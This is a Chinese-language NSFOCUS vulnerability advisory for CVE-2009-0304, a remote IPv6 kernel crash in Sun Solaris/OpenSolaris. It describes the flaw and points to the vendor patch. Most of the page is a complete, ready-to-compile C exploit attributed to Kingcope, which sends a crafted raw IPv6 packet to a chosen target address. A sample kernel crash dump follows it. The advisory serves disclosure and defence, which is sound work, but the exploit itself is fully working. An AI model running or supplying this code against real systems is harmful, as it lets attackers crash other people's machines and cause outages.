绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

Sun Solaris IPv6 'ipsec_needs_processing_v6()'远程拒绝服务漏洞

发布日期：2009-01-26
更新日期：2009-04-26

受影响系统：

Sun OpenSolaris < build snv_108

不受影响系统：

Sun OpenSolaris build snv_108

描述：

BUGTRAQ  ID: 33435
CVE ID: CVE-2009-0304

Oracle Sun Solaris是一款商业性质的操作系统。

Sun Solaris 10和11 snv_101b、OpenSolaris snv_108之前版本中的内核，允许攻击者通过特制的IPv6报文造成拒绝服务。

<*来源：Kingcope/2009

  链接：http://secunia.com/advisories/33605
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Kingcope/2009 （）提供了如下测试方法：

/*
        SunOS Release 5.11 Version snv_101b Remote IPV6
        Kernel Crash Exploit 0day
        By Kingcope/2009
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

unsigned char rawData[] =
"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
"\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
"\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";

int main(int argc, char *argv[])
{
  struct sockaddr_in6 dst;
  int s;

  if (argc < 2)
  {
    printf("SunOS Release 5.11 Version snv_101b Remote IPV6 Kernel Crash Exploit 0day By Kingcope/2009\n");
    printf("Usage: %s <dst>\n", *argv);
    return(1);
  }

  memset(&dst, 0, sizeof(dst));
  if (inet_pton(AF_INET6, (char *)argv[1], (struct in6_addr *) &dst.sin6_addr) != 1) {
        printf("Error: inet_pton()\n");
        exit(-1);
        }
        memcpy(rawData+24, &dst.sin6_addr, 16);

  dst.sin6_family = AF_INET6;

  s = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);

  printf("Sending IPV6 packet: %s\n", argv[1]);

  if (sendto(s,&rawData,sizeof(rawData),0,(struct sockaddr*)&dst,sizeof(dst)) == -1)
  {
        perror("Error sending packet");
        exit(-1);
  }

  return(0);
}

/*
Kernel Crash Dump May Look Like The Following Snippet
[ID 965332 kern.notice] ipsec_needs_processing_v6
[ID 100000 kern.notice]
[ID 655072 kern.notice] ffffff00012b9650 ip:ipsec_needs_processing_v6+10c ()
[ID 655072 kern.notice] ffffff00012b96f0 ip:ipsec_early_ah_v6+75 ()
[ID 655072 kern.notice] ffffff00012b9860 ip:ip_rput_data_v6+f4e ()
[ID 655072 kern.notice] ffffff00012b9940 ip:ip_rput_v6+64e ()
[ID 655072 kern.notice] ffffff00012b99b0 unix:putnext+21e ()
[ID 655072 kern.notice] ffffff00012b9a00 dld:dld_str_rx_fastpath+8a ()
[ID 655072 kern.notice] ffffff00012b9ad0 dls:i_dls_link_rx+2c7 ()
[ID 655072 kern.notice] ffffff00012b9b50 mac:mac_do_rx+b7 ()
[ID 655072 kern.notice] ffffff00012b9b80 mac:mac_rx+1f ()
[ID 655072 kern.notice] ffffff00012b9bd0 e1000g:e1000g_intr+135 ()
[ID 655072 kern.notice] ffffff00012b9c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ffffff00012b9c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ffffff00012c5870 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ffffff00012c58c0 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ffffff00012c58d0 unix:cmnint+ba ()
[ID 655072 kern.notice] ffffff00012c5a00 unix:ddi_mem_putb+f ()
[ID 655072 kern.notice] ffffff00012c5a40 ata:ata_disk_start_dma_out+88 ()
[ID 655072 kern.notice] ffffff00012c5a90 ata:ata_ctlr_fsm+1fb ()
[ID 655072 kern.notice] ffffff00012c5af0 ata:ata_hba_start+84 ()
[ID 655072 kern.notice] ffffff00012c5b30 ata:ghd_waitq_process_and_mutex_hold+df ()
[ID 655072 kern.notice] ffffff00012c5ba0 ata:ghd_intr+8d ()
[ID 655072 kern.notice] ffffff00012c5bd0 ata:ata_intr+27 ()
[ID 655072 kern.notice] ffffff00012c5c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ffffff00012c5c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ffffff0001205ab0 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ffffff0001205b00 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ffffff0001205b10 unix:cmnint+ba ()
[ID 655072 kern.notice] ffffff0001205c00 unix:mach_cpu_idle+b ()
[ID 655072 kern.notice] ffffff0001205c40 unix:cpu_idle+17b ()
[ID 655072 kern.notice] ffffff0001205c60 unix:idle+4c ()
[ID 655072 kern.notice] ffffff0001205c70 unix:thread_start+8 ()
[ID 100000 kern.notice]
[ID 672855 kern.notice] syncing file systems...
[ID 904073 kern.notice]  done
[ID 111219 kern.notice] dumping to /dev/zvol/dsk/rpool/dump, offset 65536, content: kernel
[ID 409368 kern.notice] ^M100% done: 56726 pages dumped, compression ratio 3.59,
[ID 851671 kern.notice] dump succeeded
[ID 540533 kern.notice] ^MSunOS Release 5.11 Version snv_101b 64-bit
[ID 172908 kern.notice] Copyright 1983-2008 Sun Microsystems, Inc.  All rights reserved.
*/

建议：

厂商补丁：

Sun
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://sunsolve.sun.com/security

浏览次数：1869
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客